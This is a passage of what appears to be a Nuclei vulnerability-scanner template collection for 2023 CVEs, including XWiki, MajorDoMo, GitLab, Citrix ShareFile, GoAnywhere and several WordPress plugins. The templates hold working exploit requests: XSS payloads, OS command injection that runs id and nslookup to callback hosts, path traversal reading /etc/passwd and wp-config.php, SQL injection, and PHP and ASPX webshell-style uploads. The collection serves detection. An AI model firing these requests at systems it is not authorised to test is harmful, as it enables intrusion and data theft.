Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)","{{BaseURL}}/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"javascript:alert(document.domain)\"","XWikiGuest"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-50917","info":{"name":"MajorDoMo thumb.php - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)","rtsp_transport"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43662","info":{"name":"ShokoServer System - Local File Inclusion (LFI)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/Image/withpath/C:\\Windows\\win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47643","info":{"name":"SuiteCRM Unauthenticated Graphql Introspection","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-XSRF-TOKEN: {{csrftoken}}\n\n{\"query\":\"query IntrospectionQuery {\\r\\n      __schema {\\r\\n        \\r\\n        queryType { name }\\r\\n        mutationType { name }\\r\\n        subscriptionType { name }\\r\\n        types {\\r\\n          ...FullType\\r\\n        }\\r\\n        directives {\\r\\n          name\\r\\n          description\\r\\n          \\r\\n          locations\\r\\n          args {\\r\\n            ...InputValue\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    }\\r\\n\\r\\n    fragment FullType on __Type {\\r\\n      kind\\r\\n      name\\r\\n      description\\r\\n      \\r\\n      fields(includeDeprecated: true) {\\r\\n        name\\r\\n        description\\r\\n        args {\\r\\n          ...InputValue\\r\\n        }\\r\\n        type {\\r\\n          ...TypeRef\\r\\n        }\\r\\n        isDeprecated\\r\\n        deprecationReason\\r\\n      }\\r\\n      inputFields {\\r\\n        ...InputValue\\r\\n      }\\r\\n      interfaces {\\r\\n        ...TypeRef\\r\\n      }\\r\\n      enumValues(includeDeprecated: true) {\\r\\n        name\\r\\n        description\\r\\n        isDeprecated\\r\\n        deprecationReason\\r\\n      }\\r\\n      possibleTypes {\\r\\n        ...TypeRef\\r\\n      }\\r\\n    }\\r\\n\\r\\n    fragment InputValue on __InputValue {\\r\\n      name\\r\\n      description\\r\\n      type { ...TypeRef }\\r\\n      defaultValue\\r\\n      \\r\\n      \\r\\n    }\\r\\n\\r\\n    fragment TypeRef on __Type {\\r\\n      kind\\r\\n      name\\r\\n      ofType {\\r\\n        kind\\r\\n        name\\r\\n        ofType {\\r\\n          kind\\r\\n          name\\r\\n          ofType {\\r\\n            kind\\r\\n            name\\r\\n            ofType {\\r\\n              kind\\r\\n              name\\r\\n              ofType {\\r\\n                kind\\r\\n                name\\r\\n                ofType {\\r\\n                  kind\\r\\n                  name\\r\\n                  ofType {\\r\\n                    kind\\r\\n                    name\\r\\n                  }\\r\\n                }\\r\\n              }\\r\\n            }\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    }\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["userHash","authenticateId","systemGeneratedPassword"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"part":"header","regex":["XSRF-TOKEN=([^;]+)"],"internal":true}]}]},{"id":"CVE-2023-4596","info":{"name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe\n\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"textarea-1\"\n\n{{randstr}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"phone-1\"\n\n{{rand_int(10)}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"email-1\"\n\ntest@gmail.com\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"name-1\"\n\n{{randstr}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"postdata-1-post-image\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"forminator_nonce\"\n\n{{forminator_nonce}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"current_url\"\n\n{{BaseURL}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"action\"\n\nforminator_submit_form_custom-forms\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Upload file</label>","forminator-field-upload"],"condition":"and"},{"type":"word","part":"body_2","words":["{\"success\":true","\"form_id\":\"{{form_id}}\"","\"behav"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"forminator_nonce","part":"body","group":1,"regex":["name=\"forminator_nonce\" value=\"([a-z0-9]+)\" \\/>"],"internal":true},{"type":"regex","name":"form_id","part":"body","group":1,"regex":["name=\"form_id\" value=\"([0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-4634","info":{"name":"Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt","{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Media Library Assistant"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-22478","info":{"name":"KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access","severity":"high"},"requests":[{"raw":["@timeout 10\nPOST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"apiVersion\":","\"uuid\":","\"userName\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28343","info":{"name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /index.php/management/set_timezone HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip, deflate\nReferer: {{RootURL}}/index.php/management/datetime\n\ntimezone=`nslookup {{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Time Zone updated successfully"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47218","info":{"name":"QNAP QTS and QuTS Hero  - OS Command Injection","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=\"avssqwfz\"\n\n--avssqwfz\nContent-Disposition: form-data; xxpcscma=\"field2\"; zczqildp=\"{{cmd}}\"\nContent-Type: text/plain\n\nskfqduny\n--avssqwfz\u2013\n","POST /cgi-bin/quick/{{file}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_1, \"code\\\": 200\", \"full_path_filename success\")","contains_all(body_2, \"uid=\", \"gid=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3846","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-40208","info":{"name":"Stock Ticker <= 3.23.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["stock_ticker","onmousemove=alert(document.domain)"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46347","info":{"name":"PrestaShop Step by Step products Pack - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /modules/ndk_steppingpack/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, \"text/html\")","contains(header, \"PrestaShop\")"],"condition":"and"}]}]},{"id":"CVE-2023-4973","info":{"name":"Academy LMS 6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/academy/tutor/filter?searched_word=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&searched_tution_class_type%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&price_min=1&price_max=9&searched_price_type%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&searched_duration%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<script>alert(document.domain)</script>\", \"List of tuitions\")"],"condition":"and"}]}]},{"id":"CVE-2023-37474","info":{"name":"Copyparty <= 1.8.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.cpr/%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4568","info":{"name":"PaperCut NG Unauthenticated XMLRPC Functionality","severity":"medium"},"requests":[{"raw":["POST /rpc/clients/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nContent-Type:text/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["conf.ssl-port","conf.auth-ttl-default"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6444","info":{"name":"Seriously Simple Podcasting < 3.0.0 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/seriously-simple-podcasting\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /?feed=itunes HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"<itunes:email>\",\"</itunes:email>\")","contains(content_type,\"text/xml\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-24489","info":{"name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\nHost: {{Hostname}}\n\n<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<script Language=\"c#\" runat=\"server\">\nvoid Page_Load(object sender, EventArgs e)\n{\n    Response.Write(\"{{randstr}}\");\n}\n</script>\n"],"payloads":{"padding":"helpers/payloads/citrix_paddings.txt"},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["body == \"ERROR: The method or operation is not implemented.\"","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["BaseURL+ \"/cifs/\" + fileName + \".aspx\""]}]}]},{"id":"CVE-2023-29923","info":{"name":"PowerJob <=4.3.2 - Unauthenticated Access","severity":"medium"},"requests":[{"raw":["POST /job/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":true,\"data\":{\"index\":0,\"pageSize\":10,"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4115","info":{"name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Enquiry summary\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-2023","info":{"name":"Custom 404 Pro < 3.7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2023-2825","info":{"name":"GitLab 16.0.0 - Path Traversal","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n","POST /users/sign_in HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\nuser%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\ngroup%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","@timeout: 15s\nPOST /projects HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nproject%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n","POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nX-CSRF-Token: {{x-csrf-token}}\nContent-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n--0ce2a9fbe06b6da89c138a35a1765ed6\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n{{randstr}}\n--0ce2a9fbe06b6da89c138a35a1765ed6--\n","GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["726f6f743a78"],"encoding":"hex"},{"type":"word","part":"header","words":["application/octet-stream","etc%2Fpasswd"],"condition":"and"}],"extractors":[{"type":"regex","name":"token_1","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"token_2","group":1,"regex":["name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"parent_id","group":1,"regex":["href=\"\\/groups\\/new\\?parent_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"namespace_id","group":1,"regex":["ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"x-csrf-token","group":1,"regex":["const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"upload-hash","group":1,"regex":["\"url\":\"\\/uploads\\/([0-9a-z]+)\\/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-31059","info":{"name":"Repetier Server - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"],"matchers-condition":"and","matchers":[{"type":"binary","part":"body","binary":["53514C69746520666F726D6174203300"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34020","info":{"name":"Uncanny Toolkit for LearnDash - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-30943","info":{"name":"Moodle - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"raw":["GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(document.domain)>.png HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /login/index.php HTTP/2\nHost: {{Hostname}}\n","POST /login/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n","GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(document.domain)>",">archive","File icon"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","part":"header_4","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-6875","info":{"name":"WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["POST /wp-json/post-smtp/v1/connect-app HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /wp-json/post-smtp/v1/connect-app HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-json/post-smtp/v1/get-log HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"success\\\":true,\", \"{\\\"fcm_token\\\":\\\"{{fcm_token}}\")","contains_all(body_3, \"true,\\\"data\\\":\", \"access_token=\")"],"condition":"and"}]}]},{"id":"CVE-2023-2648","info":{"name":"Weaver E-Office 9.5 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{file}}.php.\"\nContent-Type: image/jpeg\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\n","POST /attachment/{{name}}/{{file}}.php  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","part":"body_2","status":[200]}],"extractors":[{"type":"regex","name":"name","part":"body","group":1,"regex":["([0-9]+)"],"internal":true}]}]},{"id":"CVE-2023-26255","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jira-database-config>"]},{"type":"word","part":"header","words":["$textMime"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3345","info":{"name":"LMS by Masteriyo < 1.6.8 - Information Exposure","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/masteriyo/v1/users/ HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"username\":","\"email\":","\"roles\":"],"condition":"and"},{"type":"word","part":"header_3","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"versionString"],"internal":true}]}]},{"id":"CVE-2023-27292","info":{"name":"OpenCATS - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>Page Preview</TITLE>","<FRAME src=\"https://oast.me\">"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39110","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"word","part":"body_1","words":["rConfig"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2023-0669","info":{"name":"Fortra GoAnywhere MFT - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goanywhere/lic/accept HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\nbundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["GoAnywhere"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-0159","info":{"name":"Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"success\",\"message\":\"Items are loaded\",\"data\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4110","info":{"name":"PHPJabbers Availability Booking Calendar 5.0 - 